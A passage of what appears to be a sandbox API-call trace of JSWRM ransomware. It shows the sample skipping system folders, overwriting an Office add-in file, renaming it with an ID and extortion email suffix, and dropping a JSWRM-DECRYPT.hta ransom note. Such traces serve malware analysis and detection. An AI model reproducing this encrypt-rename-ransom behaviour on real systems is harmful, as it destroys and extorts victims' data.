lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0125.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f158 [0125.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0125.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0125.569] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16166f59, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16166f59, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1618d1a2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50d43, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.th.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0125.569] lstrcmpiW (lpString1="PowerViewRes.th.xap", lpString2=".") returned 1 [0125.569] lstrcmpiW (lpString1="PowerViewRes.th.xap", lpString2="..") returned 1 [0125.569] lstrcmpiW (lpString1="PowerViewRes.th.xap", lpString2="...") returned 1 [0125.570] lstrcmpiW (lpString1="PowerViewRes.th.xap", lpString2="windows") returned -1 [0125.570] lstrcmpiW (lpString1="PowerViewRes.th.xap", lpString2="recovery") returned -1 [0125.570] lstrcmpiW (lpString1="PowerViewRes.th.xap", lpString2="perflogs") returned 1 [0125.570] lstrcmpiW (lpString1="PowerViewRes.th.xap", lpString2="documents and settings") returned 1 [0125.570] lstrcmpiW (lpString1="PowerViewRes.th.xap", lpString2="$RECYCLE.BIN") returned 1 [0125.570] lstrcmpiW (lpString1="PowerViewRes.th.xap", lpString2="system volume information") returned -1 [0125.570] lstrcmpiW (lpString1="PowerViewRes.th.xap", lpString2="msocache") returned 1 [0125.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.th.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0125.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.th.xap", cchWideChar=19, lpMultiByteStr=0x2412b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.th.xap", lpUsedDefaultChar=0x0) returned 19 [0125.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.th.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0125.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.th.xap", cchWideChar=19, lpMultiByteStr=0x241358, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.th.xap", lpUsedDefaultChar=0x0) returned 19 [0125.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0125.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.570] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\th\\PowerViewRes.th.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\th\\powerviewres.th.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0125.571] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=331075) returned 1 [0125.571] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.572] ReadFile (in: hFile=0x338, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0125.586] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.586] WriteFile (in: hFile=0x338, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0125.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.590] CloseHandle (hObject=0x338) returned 1 [0125.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0125.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0125.590] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\th\\PowerViewRes.th.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\th\\powerviewres.th.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\th\\PowerViewRes.th.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\th\\powerviewres.th.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.600] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16166f59, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16166f59, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1618d1a2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50d43, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.th.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.600] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0125.600] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1de43d5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16140cde, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16140cde, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="tr", cAlternateFileName="")) returned 1 [0125.600] lstrcmpiW (lpString1="tr", lpString2=".") returned 1 [0125.600] lstrcmpiW (lpString1="tr", lpString2="..") returned 1 [0125.600] lstrcmpiW (lpString1="tr", lpString2="...") returned 1 [0125.600] lstrcmpiW (lpString1="tr", lpString2="windows") returned -1 [0125.600] lstrcmpiW (lpString1="tr", lpString2="recovery") returned 1 [0125.600] lstrcmpiW (lpString1="tr", lpString2="perflogs") returned 1 [0125.600] lstrcmpiW (lpString1="tr", lpString2="documents and settings") returned 1 [0125.600] lstrcmpiW (lpString1="tr", lpString2="$RECYCLE.BIN") returned 1 [0125.600] lstrcmpiW (lpString1="tr", lpString2="system volume information") returned 1 [0125.600] lstrcmpiW (lpString1="tr", lpString2="msocache") returned 1 [0125.600] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\tr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\tr\\jswrm-decrypt.hta")) returned 0xffffffff [0125.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\tr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\tr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.613] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.613] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.614] CloseHandle (hObject=0x314) returned 1 [0125.615] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\tr\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\tr\\jswrm-decrypt.hta")) returned 0x20 [0125.615] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\tr\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1de43d5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16140cde, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4188a603, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231c80 [0125.615] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.615] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1de43d5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16140cde, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4188a603, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0125.616] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.616] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.616] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x196cd32, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x196cd32, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1618d1a2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4458, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0125.616] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0125.616] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0125.616] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0125.616] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0125.616] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0125.616] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0125.616] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0125.616] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.616] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0125.616] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0125.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0125.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0125.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240f98, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0125.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2413a8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.616] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4188a603, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4188a603, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4188a603, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.616] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.616] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.616] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.616] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.616] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.616] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.616] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.616] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.616] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.616] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0125.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0125.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.617] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x514e0d9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x514e0d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5174318, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11ab8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.617] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.617] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.617] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.617] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.617] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.617] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.617] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.617] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.617] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.617] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0125.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0125.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.617] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6aef645, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12ad8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.617] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0125.617] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0125.617] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0125.617] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0125.617] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0125.617] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0125.618] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0125.618] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.618] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0125.618] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0125.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0125.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0125.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0125.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d728, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.618] FindNextFileW (in: hFindFile=0x231c80, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1de43d5, 